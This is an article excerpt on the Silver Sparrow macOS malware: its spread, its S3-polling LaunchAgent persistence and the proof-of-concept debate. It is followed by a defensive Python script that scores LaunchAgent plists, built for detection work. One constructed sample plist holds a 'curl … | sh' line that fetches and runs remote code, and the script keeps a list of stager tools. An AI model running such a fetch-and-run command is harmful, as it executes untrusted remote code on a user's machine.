Silver Sparrow uses JavaScript during installation.

Silver Sparrow has had wide distribution, but its goal is unknown.

How can one remove or prevent Silver Sparrow and other threats?

As of this moment, malware researchers have not yet conclusively identified how Silver Sparrow installation packages have made their way onto Macs. There are some indications that end users may have encountered the malware via poisoned Google search results, meaning results leading to legitimate sites that had been compromised by a threat actor, and/or malicious sites that rank highly for particular searches. Katie Nickels, a representative from Red Canary (the company that discovered the malware), suggested in a live stream on Monday that another possible source of infection may have been malicious browser extensions.

(Embedded post announcing the live stream: “… and are about to chat all things Silver Sparrow.”)

What potential harm can Silver Sparrow do to Macs?

At this time, the malware installer packages will no longer run. Apple addressed the two known variants of Silver Sparrow by revoking the developer’s code-signing certificates. Because the malware is no longer signed by an authorized Apple Developer ID, the two known variants of the malware won’t be able to run anymore if someone tries to install them today. However, it’s worth noting that Apple’s mitigation efforts may not necessarily remove all existing malware infections, and may not block potential future Silver Sparrow variants that would presumably be signed with yet another Apple Developer ID.

Before Apple’s revocation of the code-signing certificates, the malware would install a LaunchAgent as a “persistence” method (i.e. a way for the malware to continue running, even after a victim restarts their Mac). The LaunchAgent would check an Amazon AWS S3 bucket for further instructions and a potential additional malicious payload, but so far researchers have not yet observed the malware downloading any final payloads. It appears that Amazon may have shut down the S3 buckets that were associated with the two known Silver Sparrow variants. Theoretically, before revocation of their Apple certificates and cancelation of their S3 buckets, it’s possible that a final payload may have been available for a short period of time, or may have only been made available to certain victims. However, this is only speculation, and this theory unfortunately cannot be confirmed based on the currently available evidence.

Is Silver Sparrow really malware, or a mere proof of concept (PoC)?

There are a couple of indicators that have caused some to speculate that Silver Sparrow might have just been a proof of concept that somehow became widely distributed. Proponents of the proof-of-concept theory point out that researchers have not yet observed the malware installing any further malicious payloads. In other words, after the malware gets installed, it has not yet been observed to download and install additional components that can cause further harm or enhance its functionality, as the malware appears designed to do.

Furthermore, the first sample actually installs an app that, if opened, displays a message saying, “Hello, World!”, which is normally a shorthand way for a programmer to say, “This is my first attempt at making this app, and if you’re seeing this message, then the app works!”

[Image: “Hello, World!” message from OSX/Slisp variant 1. Image credit: Erika Noerenberg via Red Canary]

However, there are good reasons to think that Silver Sparrow is not merely a proof of concept. For example, there’s the fact that at least tens of thousands of Macs have been hit with this malware.
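The article notes that Apple's certificate revocation stops the known installers from running but does not necessarily clean up Macs that were already infected, and that the persistence mechanism was a LaunchAgent which periodically checked an S3 bucket for instructions. The script below is an added example (not code from the article, Intego or Red Canary) of how a defender can triage the LaunchAgent plists on a Mac for exactly that pattern. It assumes only the standard launchd agent directories (~/Library/LaunchAgents and /Library/LaunchAgents) and the documented plist keys (Label, Program, ProgramArguments, RunAtLoad, StartInterval); the user-writable path list, the stager list and the S3 hostname regex are the author's own heuristics, and the three sample plists at the bottom are constructed placeholders, not Silver Sparrow indicators.

```python
"""Triage macOS LaunchAgent property lists for persistence indicators.

Added example, not code from the article or from Red Canary/Intego. Assumes
only the standard launchd agent locations and documented plist keys; the
heuristics below are the author's own. Sample plists at the bottom are
constructed for the demonstration (placeholder hostnames and paths).
"""
import os
import plistlib
import re
from pathlib import Path

# Program locations a non-root user can write to: an agent that runs something
# from here survives reboots without the author ever touching /usr or /bin.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")

# Interpreters and fetchers typical of "download instructions, then run them"
# agents, the behaviour the article attributes to the Silver Sparrow LaunchAgent.
STAGERS = {"sh", "bash", "zsh", "curl", "wget", "osascript"}

# Any Amazon S3 hostname form (bucket.s3.amazonaws.com, s3-<region>.amazonaws.com, ...).
S3_HOST = re.compile(r"s3[.-][a-z0-9.-]*amazonaws\.com", re.IGNORECASE)

INDICATORS = ("user_writable_program", "stager_invoked", "s3_reference")


def triage(plist_bytes: bytes) -> dict:
    """Evaluate one LaunchAgent plist and return its label plus indicator flags."""
    agent = plistlib.loads(plist_bytes)
    args = list(agent.get("ProgramArguments") or [])
    # launchd executes Program if present, otherwise ProgramArguments[0].
    program = agent.get("Program") or (args[0] if args else "")
    command_line = " ".join([program] + args)
    return {
        "label": agent.get("Label", "<no label>"),
        "runs_at_load": bool(agent.get("RunAtLoad", False)),
        "user_writable_program": program.startswith(USER_WRITABLE_PREFIXES),
        "stager_invoked": any(os.path.basename(tok) in STAGERS for tok in [program] + args),
        "s3_reference": S3_HOST.search(command_line) is not None,
    }


def score(findings: dict) -> int:
    """Number of indicators raised; 0 means nothing of note in this agent."""
    return sum(1 for key in INDICATORS if findings[key])


def scan_launchagents():
    """Yield (path, findings) for every readable XML plist in the launchd agent dirs."""
    agent_dirs = [Path.home() / "Library" / "LaunchAgents", Path("/Library/LaunchAgents")]
    for directory in agent_dirs:
        if not directory.is_dir():
            continue
        for plist_path in sorted(directory.glob("*.plist")):
            try:
                yield plist_path, triage(plist_path.read_bytes())
            except (OSError, plistlib.InvalidFileException, ValueError):
                continue  # unreadable or malformed plist: worth its own report in practice


# --- Constructed sample plists (placeholders, not real indicators) ------------
_PLIST_HEAD = b'<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0">\n'
_PLIST_TAIL = b"\n</plist>\n"

BENIGN_PLIST = _PLIST_HEAD + b"""<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/updater</string>
  <key>RunAtLoad</key><true/>
</dict>""" + _PLIST_TAIL

USER_PATH_PLIST = _PLIST_HEAD + b"""<dict>
  <key>Label</key><string>example.agent</string>
  <key>ProgramArguments</key>
  <array><string>/Users/alice/Library/Application Support/example/agent.sh</string></array>
  <key>RunAtLoad</key><true/>
</dict>""" + _PLIST_TAIL

STAGER_PLIST = _PLIST_HEAD + b"""<dict>
  <key>Label</key><string>example.tasks</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -s https://example-bucket.s3.amazonaws.com/tasks.txt | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>""" + _PLIST_TAIL


if __name__ == "__main__":
    for sample in (BENIGN_PLIST, USER_PATH_PLIST, STAGER_PLIST):
        f = triage(sample)
        print(f"{f['label']}: score={score(f)} raised={[k for k in INDICATORS if f[k]]}")
    for path, f in scan_launchagents():  # live scan; only meaningful on a Mac
        if score(f):
            print(f"{path}: score={score(f)}")
```

Run on a Mac, the live scan lists every agent that raises at least one indicator; the constructed samples show the expected spread (the vendor updater scores 0, the agent running a script from the home directory scores 1, the shell one-liner fetching instructions from an S3 hostname scores 2). A score is a triage hint, not a verdict: legitimate software does run agents from ~/Library, so each hit still needs a look at the program it points to and at the signature of that program. LaunchAgents are also only one persistence location; LaunchDaemons and login items deserve the same review.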